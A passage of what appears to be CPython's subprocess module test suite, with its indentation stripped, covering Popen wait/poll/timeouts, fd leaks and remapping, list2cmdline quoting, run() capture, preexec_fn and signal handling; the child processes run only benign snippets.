# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
